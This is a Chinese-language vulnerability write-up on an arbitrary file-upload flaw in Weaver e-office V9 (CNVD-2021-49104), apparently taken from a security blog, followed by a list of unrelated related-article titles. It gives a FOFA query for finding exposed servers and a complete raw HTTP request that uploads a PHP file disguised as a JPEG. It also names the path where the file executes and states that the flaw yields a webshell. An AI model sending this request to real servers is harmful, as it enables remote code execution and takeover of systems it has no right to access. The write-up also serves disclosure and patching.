泛微E-Office文件上传漏洞(CNVD-2021-49104)

漏洞描述

泛微e-office是泛微旗下的一款标准协同移动办公平台。由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包,最终实现任意代码执行。

CNVD编号

CNVD-2021-49104

FOFA语句

app="泛微-EOffice"

影响范围

泛微e-office V9.0

漏洞危害

高危
文件上传可直接get webshell

漏洞复现

使用FOFA进行资产收集

漏洞POC

构造请求上传文件即可

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: close
Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
Content-Length: 192
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg<?php phpinfo();?>--e64bdf16c554bbc109cecef6451c26a4--

上传phpinfo()

上传成功后访问 /images/logo/logo-eoffice.php

修复建议

厂商已提供漏洞修补方案,建议用户下载使用:http://v10.e-office.cn/eoffice9update/safepack.zip

泛微E-Office文件上传漏洞(CNVD-2021-49104)相关推荐

  1. 泛微E-Office最新文件上传漏洞(CNVD-2021-49104)

    0x00  漏洞介绍 泛微e-office是泛微旗下的一款标准协同移动办公平台.主要面向中小企业.该漏洞是由于 e-office 未能正确处理上传模块中用户输入导致的,攻击者可以构造恶意的上传数据包, ...

  2. 泛微e-cology9前台文件上传漏洞复现

    目录 1.前言 2.漏洞概述 3.漏洞原理 4.影响版本 5.漏洞等级 6.漏洞复现

  3. (php)泛微E-Office文件上传漏洞(原理分析+复现+批量检测)

    漏洞描述 泛微e-office是泛微旗下的一款标准协同移动办公平台. CNVD-2021-49104 由于 e-office 未能正确处理上传模块中的用户输入,攻击者可以通过该漏洞构造恶意的上传数据包 ...

  4. 泛微OA V8 SQL注入漏洞和文件上传漏洞

    fofa语句 app="泛微-协同办公OA" SQL注入 在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中 ...

  5. 某office前台任意文件上传漏洞分析

    X微e-office的那个前台任意文件上传漏洞已经被爆出一段时间了,相关的漏洞利用脚本甚至是漏洞批量利用脚本 也有很多.在这里根据系统代码结合POC来分析一下这个漏洞点. 定位漏洞点 [私信回复&qu ...

  6. 【合天网安】FCKeditor 2.4.3文件上传漏洞

    [合天网安实验室]FCKeditor 2.4.3文件上传漏洞 编辑器漏洞 常见的文本编辑器有FCKeditor.Ewebeditor.UEditor.KindEditor.XHeditor等,它们包含 ...

  7. 文件上传漏洞_通达OA前台任意文件上传漏洞+文件包含漏洞导致getshell

    点击蓝字|关注我们 通达OA前台任意文件上传漏洞 +文件包含漏洞导致getshell 一.漏洞介绍/Profile/ 通达OA介绍: 通达OA(Office Anywhere网络智能办公系统)是由北京 ...

  8. kindeditor在服务器上上传图片显示叉叉,什么原因?,kindeditor=4.1.5 文件上传漏洞利用...

    kindeditor<=4.1.5 文件上传漏洞 - Kindeditor <=4.1.5 file upload vulnerability and use 漏洞存影响版本:小于等于4. ...

  9. 上传图片被防火墙拦截_Web安全:文件上传漏洞

    文章来源:计算机与网络安全 一般将文件上传归类为直接文件上传与间接文件上传.直接文件上传就是服务器根本没有做任何安全过滤,导致攻击者可以直接上传小马文件及大马文件(如ASP.ASPX.PHP.JSP及 ...

最新文章

  1. c语言循环并行处理,C语言设计并行处理
  2. mysql语句大全 新浪博客_MySQL语句入门
  3. ddos ***之 SYN Flood
  4. HihoCoder - 1175 拓扑排序·二
  5. [转] 实战 SSH 端口转发
  6. win7系统怎么打开屏幕键盘
  7. java封装json串示例_Java JSON示例
  8. 计算机毕业设计java+jsp学科竞赛管理系统(源码+系统+mysql数据库+Lw文档)
  9. 收集一些电子书下载的网站
  10. Conjugate function and Fenchel’s duality theorem
  11. C++ 缺省参数 详解
  12. 计算机怎样将多行文字转换成表格,用WPS文本表格转换快速合并多行文字
  13. 安装ms word时需要的正版windows xp序列号
  14. 学长冷月带你怒刷LeetCode之反转链表
  15. Ubuntu配置Hadoop——(七)安装配置Spark
  16. 百练 / 2019计算机学科夏令营上机考试 F:跳蛙
  17. 51智能小车(舵机、超声波、蓝牙)
  18. 抖音视频怎样放到项目中使用php,快手、抖音、微视类短视频SDK接入教程,7步就能搞定...
  19. Spring tool suit 配置springboot环境或maven环境
  20. HDU4507 吉哥系列故事――恨7不成妻 数位DP

热门文章

  1. 租用国外服务器应该注意哪些?
  2. c语言调用延时子程序的例子,C语言精确延时.doc
  3. flutter_engine 交叉编译【自定义编译器(最新)】
  4. openstack-ocata版本nova MQ(rpc)接收端(server)浅析
  5. android 全景拼接软件,DetuStitch(全景拼接软件)
  6. 关于计算机课的课后感受,计算机课心得体会范文
  7. Github项目(克隆,上传)简单git命令流程使用记录
  8. C++ opencv视频处理与保存
  9. c语言程序设计工作任务,C语言程序设计任务驱动教程
  10. 大火的扩散模型终于杀到了NLP领域